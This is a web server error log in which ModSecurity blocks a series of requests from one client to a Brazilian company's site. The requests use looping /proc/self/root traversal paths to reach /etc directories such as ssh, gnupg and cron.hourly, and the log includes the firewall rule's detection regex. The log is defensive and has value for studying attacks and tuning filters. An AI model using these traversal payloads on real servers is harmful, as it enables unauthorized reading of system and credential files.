[Tue Mar 17 10:23:31.377645 2026] [:error] [pid 1731:tid 140411741927168] [client 74.7.243.203:49082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV0wb2qCuy5irgBMjNwQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:32.717682 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.203:49098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV1KBJNF7axNlVR0UB9AAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:33.945503 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.243.203:49112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV1aBJNF7axNlVR0UB9wAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:36.351498 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.243.203:49122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV2K4xEDsg_V3ESNY4lAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:37.671455 2026] [:error] [pid 1016:tid 140411582465792] [client 74.7.243.203:49128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV2ZqmL8PQht4WJFlNEgAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:38.994291 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:49142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV2u82sZHvlq4xgHrIYgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:40.363333 2026] [:error] [pid 17965:tid 140411557287680] [client 74.7.243.203:32994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV3Kt8Nd0UC_OcbVG0YQAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:41.768232 2026] [:error] [pid 18709:tid 140411548894976] [client 74.7.243.203:32998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV3TarLhPAjZGI1b2ziAAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:43.083395 2026] [:error] [pid 1016:tid 140411741927168] [client 74.7.243.203:33006] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV35qmL8PQht4WJFlNEwAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:44.360018 2026] [:error] [pid 1731:tid 140411565680384] [client 74.7.243.203:33022] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV4Ab2qCuy5irgBMjNwwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:46.639852 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:33028] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV4q4xEDsg_V3ESNY4mgAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:47.926511 2026] [:error] [pid 18709:tid 140411540502272] [client 74.7.243.203:33042] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV4zarLhPAjZGI1b2ziQAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:50.180657 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.243.203:33058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV5tCmCSWTlPouqorRSQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:51.523120 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.243.203:47196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV59CmCSWTlPouqorRSgAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:52.707521 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.243.203:47198] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV6O82sZHvlq4xgHrIZQAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:53.915206 2026] [:error] [pid 18380:tid 140411616036608] [client 74.7.243.203:47204] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV6a4xEDsg_V3ESNY4mwAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:57.146750 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.203:47214] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV7dCmCSWTlPouqorRTAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:57.254832 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.228.16:33556] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablV7dCmCSWTlPouqorRTQAAAM4"]
[Tue Mar 17 10:23:58.459685 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.243.203:47224] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV7u82sZHvlq4xgHrIagAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:59.798258 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.243.203:47232] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV764xEDsg_V3ESNY4pQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:01.142191 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.243.203:38652] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV8e82sZHvlq4xgHrIawAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:24:04.077143 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.243.203:38656] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV8tCmCSWTlPouqorRTwAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
